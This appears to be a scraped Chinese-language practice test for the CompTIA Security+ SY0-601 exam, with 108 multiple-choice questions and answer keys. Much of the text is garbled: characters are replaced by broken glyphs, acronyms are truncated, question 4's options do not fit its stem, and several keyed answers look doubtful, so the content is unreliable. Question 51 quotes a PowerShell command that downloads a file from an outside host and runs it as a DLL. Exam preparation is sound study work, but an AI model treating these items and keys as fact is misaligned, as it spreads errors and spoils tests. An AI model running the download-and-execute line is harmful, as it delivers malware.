通過 SY0-601 模擬測試爲 CompTIA Security+ 考試做好戰略準備

問題 #1

首席信息安全官希望防止員工手機中的敏感信息在使用公共 USB 充電站時外泄。以下哪項是最佳解決方案？

A. LP

B. USB 數據攔截器

C. SB OTG

D. 禁用 USB 端口

查看答案

正確答案: B

問題 #2

一家公司最近發生了一起重大數據丟失事件，公司的專有信息被泄露給了競爭對手。公司採取了特別的預防措施，使用了適當的標籤；但是，電子郵件過濾日誌中沒有任何關於該事件的記錄。調查證實，公司網絡未遭到入侵，但文件從一名員工的 COPE 平板電腦上下載，並通過雲存儲傳遞給了競爭對手。以下哪項是針對此次數據泄漏的最佳補救措施？

A. 用戶培訓

B. CASB

C. MDM

D. LP

查看答案

正確答案: B

問題 #3

兩個組織計劃合作評估各自公司的新 SIEM 解決方案。兩個組織的 SOC 團隊的共同努力將加快這項工作。以下哪項可以用來記錄該協議？

A. 諒解備忘錄

B. SA

C. LA

D. DA

查看答案

正確答案: A

問題 #4

某組織的首席執行官（CEO）希望員工能夠在工作時間內隨時在家靈活工作，包括在大流行病或危機期間。但是，首席執行官擔心，一些員工可能會利用這種靈活性，在度假時在高風險國家工作，或將工作外包給另一個國家的第三方機構。首席信息官（CIO）認爲，公司可以實施一些基本控制措施，以減少以下主要風險

A. RAT 已被安裝，並正在傳輸其他利用工具。

B. ��作站正在向命令控制服務器發出信標。

C. ��行了一個邏輯炸彈，負責數據傳輸。

D. ��文件病毒正在本地網絡環境中傳播

查看答案

正確答案: AB

問題 #5

一名網絡工程師和一名安全工程師正在討論監控網絡運行的方法。以下哪種方法是最佳方法？

A. ��用 Telnet 並強制 SSH。

B. ��立連續的 ping。

C. ��用無代理監控器

D. ��用帶密碼的 SNMPv3。

查看答案

正確答案: C

問題 #6

以下哪種方法通常結合使用人工智能來分析事件數據，並在不幹預的情況下採取行動？

A. TP

B. OSINT

C. OAR

D. SIEM

查看答案

正確答案: C

問題 #7

一家公司正在爲所有存儲敏感數據的應用程序實施 MFA。IT 經理希望 MFA 不會造成幹擾，而且對用戶友好。在實施 MFA 時，IT 經理應該使用以下哪種技術？

A. ��次性密碼

B. 電子郵件令牌

C. 推送通知

D. 硬件驗證

查看答案

正確答案: C

問題 #8

以下哪個術語描述了對特定組織敏感的廣泛信息？

A. 公衆

B. ��密

C. ��有

D. 開放源碼

查看答案

正確答案: C

問題 #9

某組織計劃開設其他數據中心，以便在發生自然災害時維持運營。以下哪些考慮因素能最好地支持該組織的恢復能力？

A. 地理擴散

B. 發電機供電

C. 滅火

D. 設施自動化

查看答案

正確答案: A

問題 #10

以下哪項控制措施用於讓組織初步意識到數據泄露？

A. 保護

B. 預防

C. ��正

D. ��探

查看答案

正確答案: D

問題 #11

某組織的信息安全經理首次完成 PCI DSS 自我評估。以下哪項最有可能是進行此類評估的原因？

A. ��前正在實施一項國際擴展項目。

B. ��部顧問利用這一工具來衡量安全成熟度。

C. ��組織預計將處理信用卡信息。

D. ��府監管機構要求完成這項審計。

查看答案

正確答案: C

問題 #12

某醫院一臺與網絡連接的磁共振成像（MRI）掃描儀由過時且不支持的專用 Windows 操作系統控制和運行。以下哪項最有可能阻止醫院的 IT 經理升級專用操作系統？

A. ��共振成像供應商升級系統所需的時間會對病人產生負面影響。

B. ��共振成像儀供應商不支持更新版本的操作系統

C. ��改操作系統違反了磁共振成像供應商的支持服務水平協議。

D. IT 團隊沒有升級磁共振成像掃描儀所需的預算。

查看答案

正確答案: B

問題 #13

攻擊者認爲影響運行的最佳方法是滲透第三方軟件供應商。利用的是以下哪種載體？

A. 社交媒體

B. ��

C. 供應鏈

D. 社會工程學

查看答案

正確答案: C

問題 #14

一家大型 MSSP 的 SOC 正在開會討論從最近一起耗時過長的事件中吸取的經驗教訓。最近幾周，這種類型的事件變得越來越常見，由於要執行手動任務，耗費了分析人員大量的時間。SOC 應考慮採用以下哪種解決方案來最好地縮短響應時間？

A. ��用交換式端口分析儀配置 NIDS 設備。

B. ��集 OSINT 並在中央存儲庫中對人工製品進行編目。

C. ��用可定製的操作手冊實施 SOAR。

D. ��裝具有社區驅動威脅情報的 SIEM。

查看答案

正確答案: C

問題 #15

一名安全分析員正在使用 OSINT 收集信息，以驗證公司數據是否可公開獲取。以下哪個應用程序最適合該分析員使用？

A. heHarvester

B. 布穀鳥

C. map

D. essus

查看答案

正確答案: A

問題 #16

以下哪項提供了已知漏洞的計算值，以便組織優先採取緩解措施？

A. VSS

B. SIEM

C. OAR

D. VE

查看答案

正確答案: A

問題 #17

業務合作夥伴正在研究一種安全機制，以安全地驗證交易。要求由一家公司負責部署可信解決方案，該解決方案將註冊和發布用於籤名、加密和解密交易文件的工件。以下哪項是最佳解決方案？

A. ��鑰基礎設施

B. ��塊鏈

C. AML

D. Auth

查看答案

正確答案: A

問題 #18

以下哪項是與包含財務信息的數據存檔相關的已知安全風險？

A. ��果數據存檔時間超過監管指南的要求，就會成爲一種負擔。

B. ��據必須異地存檔，以避免外泄並滿足業務要求。

C. ��止公司向電子發現請求提供存檔數據。

D. 未加密的檔案應儘可能長期保存並加密。

查看答案

正確答案: A

問題 #19

一家知名企業一直在遭受 APT 的攻擊。該組織擔心，有人正在創建自定義惡意軟件並通過電子郵件發送到公司，或將其安裝在丟棄在停車場的 USB 記憶棒上。針對這種情況，以下哪項是最佳防禦措施？

A. ��置基於籤名的防病毒軟件，每 30 分鐘更新一次

B. ��電子郵件執行 S/MIME，並在插入 USB 驅動器時自動加密

C. ��未知軟件沙箱中執行應用程序

D. ��果新文件沒有數字籤名，則對其進行模糊測試，查找漏洞

查看答案

正確答案: C

問題 #20

作爲安全合規性評估的一部分，審計員要執行自動漏洞掃描。此外，爲完成評估，審計員還應完成以下哪些工作？

A. ��戶行爲分析

B. 數據包捕獲

C. ��置審查

D. 日誌分析

查看答案

正確答案: C

問題 #21

一位 IT 安全經理要求提供一份關於公司公開信息的報告。該經理擔心的是，惡意行爲者能夠在不進行主動偵查的情況下訪問數據。以下哪種方法是最有效的分析方法？

A. 爲 Harvester 工具提供域參數。

B. 使用 dnsenum 檢查公共 DNS 條目。

C. ��對一家上市公司的 IP 執行 Nessus 漏洞掃描。

D. ��用 "掃描所有端口 "和 "偷偷摸摸模式 "選項執行 nmap。

查看答案

正確答案: A

問題 #22

一名安全分析師注意到網絡邊緣出現了異常流量。在檢查日誌時，分析師確定了一個源 IP 地址，並阻止該地址與網絡通信。儘管分析員阻止了這個地址，但攻擊仍在繼續，而且來自大量不同的源 IP 地址。以下哪項描述了這種類型的攻擊？

A. DoS

B. ��限升級

C. NS中毒

D. ��衝區溢出

查看答案

正確答案: A

問題 #23

以下哪項是風險轉移的例子？

A. 購買保險

B. ��有漏洞的服務器打補丁

C. 淘汰過時的應用程序

D. ��用程序所有者風險籤核

查看答案

正確答案: A

問題 #24

以下哪種安全控制可用於防止多人使用唯一的刷卡器進入安全入口？

A. 遊客日誌

B. 法拉第籠

C. 入口控制前庭

D. 移動偵測傳感器

查看答案

正確答案: C

問題 #25

一家零售公司的營銷部門希望在互聯網上發布一個內部網站，以便少數特定的外部服務提供商可以安全地訪問該網站。以下哪種配置最能滿足這一要求？

A. AC

B. CL

C. AF

D. AT

查看答案

正確答案: B

問題 #26

一家公司希望將一些服務器遷移到雲端，以儘量減少技術佔用。該公司有一個客戶關係管理系統。以下哪種解決方案最不需要公司提供基礎架構和應用程序支持？

A. SaaS

B. aaS

C. PaaS

D. DN

查看答案

正確答案: A

問題 #27

網絡安全分析師查看網絡服務器的日誌文件，發現一系列文件表明發生了目錄遍歷攻擊。分析師最有可能看到以下哪種情況？

A. ttp://sample

B. ttp://sample

C. ttp://sample

D. ttp://redirect

查看答案

正確答案: B

問題 #28

一位安全架構師正在爲一家業務合作夥伴設計遠程訪問解決方案。該業務合作夥伴需要訪問公司的一臺 Linux 服務器。該業務合作夥伴希望避免管理用於身份驗證的密碼和額外的軟件安裝。架構師應推薦以下哪項？

A. 軟令牌

B. 智能卡

C. 企業社會責任

D. SH 密鑰

查看答案

正確答案: D

問題 #29

一名安全分析員希望參考一項標準來制定風險管理計劃。以下哪種資料最適合分析師使用？

A. SAE SOC 2

B. SO 31000

C. NIST CSF

D. DPR

查看答案

正確答案: B

問題 #30

將面向互聯網的應用程序的代碼開發外包給第三方承包商時，以下哪項是最大的安全問題？

A. 知識產權盜竊

B. ��升特權

C. ��知後門

D. 質量保證

查看答案

正確答案: C

問題 #31

以下哪個概念最恰當地描述了對軟件更改的跟蹤和記錄，以及對文件和系統訪問的管理？

A. 版本控制

B. 持續監測

C. ��儲程序

D. 自動化

查看答案

正確答案: A

問題 #32

以下哪種工具能有效防止用戶訪問未經授權的可移動媒體？

A. SB 數據攔截器

B. 法拉第籠

C. 感應讀卡器

D. 電纜鎖

查看答案

正確答案: A

問題 #33

一位安全分析師在一次事故後正在查看網絡服務器的漏洞掃描報告。用於利用該服務器的漏洞出現在歷史漏洞掃描報告中，並且有針對該漏洞的修補程序。以下哪項是最可能的原因？

A. 由於用戶的影響，安全補丁被卸載。

B. ��手篡改了漏洞掃描報告

C. ��用零時差漏洞入侵網絡服務器

D. ��描報告漏洞爲假陰性

查看答案

正確答案: A

問題 #34

一名安全分析員正在調查 IP 地址爲 10.10.1.1 的網絡服務器上的可疑流量。對 WAF 日誌的搜索顯示了以下輸出：以下哪項最有可能發生？

A. SS攻擊

B. SQLi 攻擊

C. ��放攻擊

D. XSRF 攻擊

查看答案

正確答案: B

問題 #35

以下哪項政策可以提高整個組織的知識深度和廣度？

A. 資產管理政策

B. 職責分離政策

C. ��接受使用政策

D. ��作輪換政策

查看答案

正確答案: D

問題 #36

以下哪項能最好地爲熱調節提供檢測和糾正控制？

A. ��霧探測器

B. 火災警報器

C. ��通空調系統

D. 滅火系統

E. 警衛

查看答案

正確答案: C

問題 #37

一位安全分析師注意到，每次系統管理員休假時，特定文件都會被刪除。以下哪項最恰當地描述了運行的惡意軟件類型？

A. ��文件病毒

B. 邏輯炸彈

C. ��盤記錄器

D. ��索軟件

查看答案

正確答案: B

問題 #38

以下哪項是阻止或防止網絡數據外泄的有效工具？

A. LP

B. IDS

C. PM

D. DE

查看答案

正確答案: A

問題 #39

網站訪問者必須在網站表單的特定字段中提供格式正確的信息。以下哪種安全措施最有可能用於這項任務？

A. 輸入驗證

B. ��碼籤署

C. QL注入

D. 提交表格

查看答案

正確答案: A

問題 #40

安全管理員懷疑服務器上可能運行了不必要的服務。管理員最有可能使用以下哪種工具來確認懷疑？

A. map

B. Wireshark

C. ��體解剖

D. NSEnum

查看答案

正確答案: A

問題 #41

一家公司在公共區域部署了一個 WiFi 接入點，並希望強化配置使其更加安全。進行評估後，分析員發現接入點配置爲使用 WPA3、AES、WPS 和 RADIUS。分析員應禁用以下哪項來增強接入點的安全性？

A. PA3

B. ES

C. ADIUS

D. WPS

查看答案

正確答案: D

問題 #42

某製造公司有幾個一次性遺留信息系統，由於軟件兼容性問題，無法遷移到更新的操作系統。供應商仍然支持操作系統，但不再支持工業軟件。首席信息安全官爲這些系統制定了一項恢復計劃，允許在非生產環境中安裝操作系統補丁，同時創建系統備份以進行恢復。以下哪種恢復技術將

A. ��餘

B. AID 1+5

C. ��擬機

D. 完整備份

查看答案

正確答案: C

問題 #43

一位新來的安全工程師開始加固系統。該工程師使用的加固技術之一是禁用 NAS 的遠程登錄。用戶現在報告無法使用 SCP 將文件傳輸到 NAS，儘管數據仍然可以從用戶的 PC 上查看。以下哪項最有可能導致這一問題？

A. ��地主機上的 TFTP 已禁用。

B. ��有修改配置文件，而是關閉了 SSH。

C. �� networkd

D. NAS 上不再運行網絡服務。

查看答案

正確答案: B

問題 #44

某組織最近發布了一項軟件保證政策，要求開發人員每晚在存儲庫上運行代碼掃描。第一晚過後，安全團隊提醒開發人員，已報告了 2000 多項發現，需要加以解決。以下哪項最有可能導致大量發現？

A. ��洞掃描儀配置不當，產生了大量誤報。

B. ��三方庫已加載到版本庫中，應從代碼庫中刪除。

C. ��洞掃描儀在運行過程中發現多個內存泄漏，導致重複報告同一問題。

D. ��洞掃描儀未加載正確的基準，需要更新。

查看答案

正確答案: A

問題 #45

安全管理員檢查接入交換機的 ARP 表時，看到以下輸出：

A. a0/2 端口上的 DDoS

B. a0/2端口上的MAC泛洪

C. a0/1 端口上的 ARP 中毒

D. ��口 Fa0/1 上的 DNS 中毒

查看答案

正確答案: B

問題 #46

一位安全分析師正在評估授權多個安全解決方案從公司雲環境中收集數據的風險。以下哪項是這些集成的直接後果？

A. 不遵守數據主權規則

B. 失去供應商的互操作性支持

C. ��制部署 SIEM 解決方案

D. ��加攻擊面

查看答案

正確答案: D

問題 #47

以下哪種控制措施能最好地防止追尾？

A. ��禁前庭

B. ��路電視

C. 感應卡讀卡器

D. 法拉第籠

查看答案

正確答案: A

問題 #48

一位安全分析師正在尋找一種解決方案，以幫助向領導團隊傳達組織漏洞的嚴重程度。以下哪種方案能最好地滿足這一需求？

A. VE

B. SIEM

C. OAR

D. VSS

查看答案

正確答案: D

問題 #49

以下哪些組件可用於通過單個防火牆整合和轉發多個雲環境的入站互聯網流量？

A. 過境網關

B. 雲熱點網站

C. 邊緣計算

D. NS天坑

查看答案

正確答案: A

問題 #50

某機構維護着多個環境，在將補丁部署到運行狀態之前，要在這些環境中開發和測試補丁。在進入運行狀態之前，將在以下哪個環境中部署補丁？

A. 發展

B. 測試

C. ��產

D. ��期

查看答案

正確答案: D

問題 #51

一名員工收到了一封電子郵件，其中有一個名爲 Updates.lnk 的異常文件附件。一名安全分析師正在對該文件進行逆向工程，發現它執行了以下腳本：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundl132.exe $env:TEMP\autoupdate.dll 以下哪項最恰當地描述了分析師的發現？

A. owerShell 代碼正在執行 DLL 注入。

B. PowerShell 代碼正在顯示一張圖片。

C. ��段 PowerShell 代碼正在配置環境變量。

D. ��段 PowerShell 代碼正在更改 Windows Update 設置。

查看答案

正確答案: A

問題 #52

一位安全分析師正在查看計算機日誌，因爲一臺主機被惡意軟件入侵。計算機被感染後顯示了一個錯誤屏幕並關閉。爲了確定更多信息，分析員應首先查看以下哪項？

A. ��儲文件

B. 系統日誌

C. 網絡應用程序日誌

D. 安全日誌

查看答案

正確答案: A

問題 #53

以下哪項可以衡量設備發生故障前的平均運行時間？

A. 系統性紅斑狼瘡

B. MTBF

C. TO

D. RO

查看答案

正確答案: B

問題 #54

以下哪項是與在公共雲中託管應用程序特別相關的風險？

A. 無擔保根賬戶

B. ��日

C. ��租

D. ��部威脅

查看答案

正確答案: C

問題 #55

攻擊者將數字籤名文檔替換成另一個未被察覺的版本。在查看文檔內容時，作者注意到文檔中增加了一些原來沒有的文字，但無法驗證完整性問題。使用了以下哪種攻擊？

A. ��密軟件

B. 哈希替換

C. 碰撞

D. ��絡釣魚

查看答案

正確答案: B

問題 #56

一名安全工程師必須在一個辦公套件中部署兩臺無線路由器。工程師應實施以下哪種協議來確保最嚴格的加密？

A. WPS

B. PA2

C. AP

D. TTPS

查看答案

正確答案: B

問題 #57

安全事件已經解決。以下哪項最能說明事件響應計劃最後階段的重要性？

A. ��查並記錄團隊的應對情況，發現事件的起因，並確定今後如何避免事件的發生。

B. ��對系統進行全面修補、恢復數據和處理漏洞後，受影響的系統將重新投入生產。

C. ��定事件和漏洞範圍、對生產環境的影響以及入侵點。

D. ��制受影響的系統，切斷它們與網絡的連接，防止攻擊或漏洞進一步擴散。

查看答案

正確答案: A

問題 #58

以下哪項是公布文件哈希值的理由？

A. 驗證文件的完整性

B. ��證軟件是否經過數字籤名

C. ��哈希值用作軟件激活密鑰

D. ��哈希值用作解密口令

查看答案

正確答案: A

問題 #59

一家提供在線流媒體服務的公司在雲存儲服務中公開了其客戶的個人數據，包括姓名和電子郵件地址。結果，該公司收到的刪除用戶賬戶的請求數量增加了。以下哪項最恰當地描述了數據泄露的後果？

A. 監管罰款

B. 聲譽受損

C. 保險費用增加

D. 經濟損失

查看答案

正確答案: B

問題 #60

爲了減少欺詐交易造成的損失，會計部門應採用以下哪種控制類型？

A. 恢復

B. 威懾

C. ��正

D. ��探

查看答案

正確答案: D

問題 #61

一名安全分析師收到公司 SIEM 發出的警報，稱異常活動來自本地源 IP 地址 192.168.34.26。首席信息安全官要求分析員阻止該來源。幾天後，另一名員工開了一張內部票據，指出漏洞掃描不再正常執行。該員工提供的 IP 地址是 192.168.34.26。以下哪項描述了這種類型的警報？

A. ��否定

B. ��陽性

C. ��陽性

D. 假陰性

查看答案

正確答案: C

問題 #62

一家公司需要使用真實場景驗證其更新的事件響應計劃，該場景將測試決策點和相關事件響應行動，而不會中斷日常運營。以下哪項 BEST 能滿足公司的要求？

A. ��隊演習

B. 奪旗演習

C. 桌面演練

D. ��絡釣魚練習

查看答案

正確答案: C

問題 #63

某組織的首席安全官 (CSO) 希望驗證企業在事件響應計劃中的參與情況，以確保計劃的有效性和全面性。首席安全官最有可能使用以下哪種方法？

A. 外部安全評估

B. 漏洞懸賞計劃

C. 桌面演練

D. 紅隊參與

查看答案

正確答案: C

問題 #64

一家大型製造公司更新了內部基礎設施，最近剛剛開始允許 OAuth 應用程序訪問公司數據。現在有數據泄漏的報告。以下哪種情況最有可能導致該問題？

A. ��權蠕變

B. 未修改的默認設置

C. LS協議漏洞

D. ��丁管理不當

查看答案

正確答案: B

問題 #65

一位零售業高管最近接受了一家主要競爭對手的工作。下周，一位安全分析師查看了安全日誌，發現有人試圖成功登錄該離職高管的賬戶。以下哪種安全措施可以解決這個問題？

A. 保密協議

B. ��小特權

C. ��接受的使用政策

D. 離崗培訓

查看答案

正確答案: D

問題 #66

一名安全分析師正在調查一份滲透測試報告。在滲透測試期間，顧問能夠從後端服務器下載敏感數據。該後端服務器公開了一個 API，而該 API 本應只能從公司的移動應用程序中獲取。在查看後端服務器日誌後，安全分析師發現以下條目：以下哪項最有可能導致安全控制繞過？

A. IP 地址允許列表

B. 用戶代理欺騙

C. WAF 旁路

D. ��縱推薦人

查看答案

正確答案: B

問題 #67

以下哪項是促進一致和可審計的事件響應流程的最佳措施？

A. ��勵新員工不斷用外部知識更新文件。

B. 在便於組織訪問的中央存儲庫中發布文件。

C. 只允許各 IT 部門的主題專家對流程發表評論。

D. ��換 CIRT 成員，在組織內形成責任分擔模式。

查看答案

正確答案: D

問題 #68

一家公司正在將其零售網站遷移到公共雲提供商。該公司希望標記信用卡數據，但不允許雲提供商查看存儲的信用卡信息。以下哪種方法能最好地實現這些目標？

A. AF

B. CASB

C. PN

D. LS

查看答案

正確答案: B

問題 #69

某公司希望簡化證書管理流程。該公司有一個域名和幾十個子域名，所有這些域名都可以在互聯網上公開訪問。以下哪項最好地描述了該公司應採用的證書類型？

A. 主題備選名稱

B. ��配符

C. ��籤名

D. 域名驗證

查看答案

正確答案: B

問題 #70

一名安全分析師生成了一個名爲 host1.pcap 的文件，並與一名團隊成員共享，後者將使用該文件進行進一步的事件分析。其他團隊成員最有可能使用以下哪種工具打開該文件？

A. ��體解剖

B. emdump

C. FTK 相機

D. ireshark

查看答案

正確答案: D

問題 #71

負責數據集的經理要求安全工程師對硬盤中的數據進行加密。安全工程師就是 __________ 的一個例子。

A. 數據控制者。

B. ��據所有者。

C. ��據保管人。

D. 數據處理器。

查看答案

正確答案: C

問題 #72

安全管理員需要使用企業防火牆阻止一個 TCP 連接。由於該連接可能構成威脅，管理員不想發送 RST。防火牆規則中的以下哪種操作最有效？

A. rop

B. 拒絕

C. ��誌警報

D. ��可證

查看答案

正確答案: A

問題 #73

安全管理員需要檢查企業網絡上的傳輸中文件，以搜索 PII、信用卡數據和分類詞。以下哪種方法最合適？

A. IDS 解決方案

B. 電子數據記錄儀解決方案

C. IPS軟件解決方案

D. 網絡 DLP 解決方案

查看答案

正確答案: D

問題 #74

熱點（不支持拖放）在生產環境中發生了一起事故。說明分析命令輸出並確定受損類型。如果您想在任何時候恢復模擬的初始狀態，請單擊 "全部重置 "按鈕：

A. ��案見說明部分。

查看答案

正確答案: A

問題 #75

以下哪種攻擊是針對特定行業或羣體用戶的定向攻擊？

A. ��水孔

B. 打錯別字

C. ��局

D. 冒名頂替

查看答案

正確答案: A

問題 #76

某公司在雲中有一個扁平網絡。該公司需要實施一種解決方案，在不將服務器遷移到新網絡的情況下劃分生產服務器和非生產服務器。該公司應實施以下哪種解決方案？

A. ��聯網

B. ��選子網

C. LAN分段

D. 零信任

查看答案

正確答案: C

問題 #77

一位在政府機構工作的安全管理員希望利用分類和細粒度規劃來保護絕密數據，並根據 "需要知道 "的原則授予訪問權限。管理員應該考慮以下哪種訪問控制模式？

A. ��制性

B. 基於規則

C. ��由裁量權

D. 基於角色

查看答案

正確答案: A

問題 #78

在安全評估過程中，安全分析員發現一個文件的權限過於寬鬆。以下哪種工具能讓分析師減少現有用戶和組的權限，並刪除文件中的設置用戶 ID 位？

A. s

B. hflags

C. hmod

D. sof

E. etuid

查看答案

正確答案: C

問題 #79

要使 IDS 和 WAF 對 HTTPS 流量有效，需要具備以下哪項？

A. 哈希算法

B. NS天坑

C. LS檢查

D. 數據屏蔽

查看答案

正確答案: C

問題 #80

一名網絡工程師正在排除用戶報告的無線網絡連接問題。這些問題只發生在大樓最靠近停車場的部分。用戶在訪問網站時會間歇性地遇到速度緩慢的問題，並且無法連接到網絡驅動器。當筆記本電腦用戶在大樓其他區域使用設備後返回辦公桌時，問題似乎會增多。也有報告稱，用戶被要求輸入"......"。

A. ��個外部接入點正在進行邪惡雙胞胎攻擊。

B. 需要增加大樓該區域 WAP 的信號。

C. ��備上的證書已過期，需要重新安裝。

D. ��樓該區域的用戶所在的 VLAN 被防火牆阻斷

查看答案

正確答案: A

問題 #81

某組織擔心黑客可能進入設施並插入遠程訪問的 Kali Linux 盒子。以下哪項應該是防範此類攻擊的第一道防線？(選擇兩項）。

A. 社交媒體分析

B. 年度信息安全培訓

C. 遊戲化

D. ��絡釣魚活動

查看答案

正確答案: BC

問題 #82

安全管理員希望確保所有雲服務器都預裝了軟件，以方便漏洞掃描和持續監控。管理員應利用以下哪些概念？

A. 籌備

B. 分級

C. ��期

D. 質量保證

查看答案

正確答案: A

問題 #83

以下哪項是在軟件投入生產前檢測軟件中嵌入的第三方庫安全漏洞的最有效方法？

A. 採用不同的技術進行服務器端和客戶端驗證

B. ��第三方庫使用不同的版本控制系統

C. ��施漏洞掃描，在 SDLC 早期評估依賴性

D. ��加軟件發布前的滲透測試次數

查看答案

正確答案: C

問題 #84

以下哪項使用 SAML 進行身份驗證？

A. OTP

B. ��邦

C. erberos

D. OTP

查看答案

正確答案: B

問題 #85

模擬一名系統管理員需要安裝一個新的無線網絡，用於經過身份驗證的訪客訪問。該無線網絡應使用最安全的加密和協議支持 802.1X。說明執行以下步驟：4.配置 RADIUS 服務器。5.配置 WiFi 控制器。6.預配置客戶機，以接收訪客。訪客 AD 憑據如下：用戶：guest01 密碼：guestpass如果你想隨時恢復模擬的初始狀態，請點擊

A. ��下文解釋。

查看答案

正確答案: A

問題 #86

安全分析員收到 SIEM 警報，稱有人登錄了 appadmin 測試帳戶，該帳戶僅用於早期檢測攻擊。安全分析員隨後查看了以下應用程序日誌：安全分析員可以得出以下哪些結論？

A. ��用程序正在遭受重放攻擊。

B. ��對用戶身份驗證系統的注入攻擊正在進行。

C. 服務帳戶密碼可能已更改，導致在應用程序內連續登錄失敗。

D. ��證過的漏洞掃描器攻擊正在針對應用程序測試多個 CVE。

查看答案

正確答案: B

問題 #87

以下哪項涉及在代碼編寫完成後立即將其納入主代碼庫？

A. 持續監測

B. ��續部署

C. 持續驗證

D. 持續集成

查看答案

正確答案: D

問題 #88

一家公司正在審核其歐洲客戶個人信息的處理方式。該公司應諮詢以下哪些人員？

A. DPR

B. SO

C. IST

D. CI DSS

查看答案

正確答案: A

問題 #89

某組織因其網絡爆發惡意軟件而啓動了事件響應計劃。該組織已請來一個取證小組，該小組已確定一臺面向互聯網的 Windows 服務器可能是最初的入侵點。已知檢測到的惡意軟件系列是通過手動登錄服務器並運行惡意代碼來傳播的。爲防止感染載體的再次感染，BEST 將採取以下哪些措施？

A. ��止從內部網絡通過 TFTP 進行連接。

B. ��建一條防火牆規則，阻止從互聯網到服務器的 22 連接。

C. ��止通過 445 端口與服務器共享文件。

D. ��止 3389 端口從不受信任的網絡進入。

查看答案

正確答案: C

問題 #90

一名安全分析師在一次事故後正在查看一臺網絡服務器的最新漏洞掃描報告。漏洞報告沒有顯示任何相關發現。用於利用該服務器的漏洞出現在歷史漏洞掃描報告中，並且有針對該漏洞的修補程序。以下哪項是最可能的原因？

A. ��於版本不兼容，安全補丁安裝失敗。

B. ��手篡改了漏洞掃描報告。

C. ��絡服務器被利用了零日漏洞。

D. ��描報告該漏洞爲假陰性。

查看答案

正確答案: D

問題 #91

某公司希望限制通過電子郵件發送 PHI 文檔。該公司正在實施 DLP 解決方案。爲了限制 PHI 文檔，應首先執行以下哪項操作？

A. 保留

B. 治理

C. 分類

D. 變革管理

查看答案

正確答案: C

問題 #92

某公司員工的公司手機收到主動發送的短信。這些主動發送的短信包含一個密碼重置鏈接。該公司受到了以下哪種攻擊？

A. ��絡釣魚

B. 網絡釣魚

C. ��魚

D. 垃圾郵件

查看答案

正確答案: C

問題 #93

某公司即將遷往新址。系統管理員向設施工作人員提出了以下服務器機房要求：-在停電或電壓尖峯情況下保持穩定的功率水平-停電後至少有 30 分鐘的運行時間-能夠觸發關鍵系統的優雅關機以下哪項最能滿足要求？

A. ��護備用燃氣發電機

B. ��計算機設備上使用大型浪湧抑制器

C. ��置受管 PDU 以監控功率水平

D. ��署適當大小的、與網絡連接的 UPS 設備

查看答案

正確答案: D

問題 #94

要遏制影響大量組織的迅速蔓延的攻擊，以下哪種方法最有效？

A. 機器學習

B. NS天坑

C. 封鎖清單

D. ��罐

查看答案

正確答案: B

問題 #95

在最近的一次滲透測試中，測試人員發現大量數據在 12 個月內通過互聯網外流。滲透測試人員停止了測試，並將結果告知客戶。客戶下一步應採取以下哪項措施來緩解這一問題？

A. ��行全面的漏洞掃描，找出可能存在的漏洞。

B. ��關鍵服務器和資源執行遏制。

C. 查看防火牆並確定活動連接的來源。

D. 將整個基礎設施與互聯網斷開。

查看答案

正確答案: B

問題 #96

一名安全分析師發現，一家公司的用戶名和密碼數據庫被張貼在一個互聯網論壇上。用戶名和密碼以純文本形式存儲。以下哪項措施可減輕今後此類數據外泄造成的損失？

A. 創建 DLP 控制，防止文檔離開網絡。

B. 實施加鹽和散列

C. ��置網絡內容過濾器，阻止訪問論壇。

D. 提高密碼複雜性要求

查看答案

正確答案: B

問題 #97

以下哪項是規避風險的例子？

A. ��接在生產中安裝安全更新，以加速漏洞修復

B. ��買保險，爲與剝削有關的經濟損失做好準備

C. ��安裝新軟件以防止出現兼容性錯誤

D. ��採取預防措施阻止設備失竊

查看答案

正確答案: C

問題 #98

一位安全架構師正在研究一種發送敏感數據的電子郵件解決方案。但是，目前預算中沒有資金用於建設額外的基礎設施。該架構師應選擇以下哪種方案？

A. OP

B. IPSec

C. MAP

D. GP

查看答案

正確答案: D

問題 #99

以下哪項既可作爲身份驗證方法，也可作爲未經授權訪問嘗試的警報機制？

A. 智能卡

B. 推送通知

C. ��證服務

D. 基於 HMAC

E. ��次性密碼

查看答案

正確答案: B

問題 #100

某公司正在文件服務器上實施 DLP 解決方案。文件服務器上存儲有 PII、財務信息和健康信息。根據文件服務器上託管的數據類型，公司希望爲數據分配不同的 DLP 規則。公司應採取以下哪些措施來幫助實現這一目標？

A. 對數據進行分類。

B. ��蔽數據

C. ��定應用程序所有者

D. 進行風險分析。

查看答案

正確答案: A

問題 #101

客戶 Ann 收到抵押貸款公司的通知，稱可能會與合作夥伴、附屬機構和聯營公司共享她的 PII，以維持日常業務運營。安收到了以下哪些文件？

A. 年度隱私通知

B. 保密協議

C. ��權用戶協議

D. 諒解備忘錄

查看答案

正確答案: A

問題 #102

以下哪個文件規定了在物理或虛擬系統發生災難性損失時應採取的措施？

A. 數據保留計劃

B. 事件應對計劃

C. ��後恢復計劃

D. 交流計劃

查看答案

正確答案: C

問題 #103

員工的公司電子郵件被配置爲有條件訪問，並要求啓用和使用 MFA。MFA 的一個例子是電話和：

A. 推送通知

B. ��碼

C. 短信

D. 驗證應用程序

查看答案

正確答案: B

問題 #104

某機構剛剛實施了一套新的安全系統。當地法律規定，在遇到檢測機制之前必須通知公民，以阻止惡意活動。正在實施以下哪項措施？

A. 帶防護裝置的感應卡

B. ��電圍欄

C. 帶警報器的無人機

D. 帶標牌的運動傳感器

查看答案

正確答案: D

問題 #105

事件響應技術人員在調查期間收集了一個移動設備。爲保持監管鏈，技術人員應執行以下哪些操作？

A. ��錄收集情況，並在所有權發生變化時要求籤收。

B. 將設備鎖在保險箱或其他安全的地方，以防被盜或被改動。

C. ��設備放在法拉第籠中，以防止數據損壞。

D. 在受區塊鏈保護的公共分類賬中記錄收集的信息。

查看答案

正確答案: A

問題 #106

涉及用戶界面開發人員協議的客戶在考慮在高度敏感的項目中使用這些產品時，應注意以下哪些事項？

A. 弱配置

B. 整合活動

C. ��安全的用戶賬戶

D. ��包代碼開發

查看答案

正確答案: A

問題 #107

在確定安全事件的根本原因後，應執行以下哪些程序，以幫助避免今後發生事件？

A. 演練

B. 經驗教訓

C. 攻擊框架調整

D. 隔離

查看答案

正確答案: B

問題 #108

作爲初始配置的一部分，以下哪項提供了如何給新網絡設備貼標籤的指導？

A. IP 模式

B. ��用程序基線配置

C. ��準命名約定政策

D. ��線局域網和網絡邊界圖

查看答案

正確答案: C

問題 #109

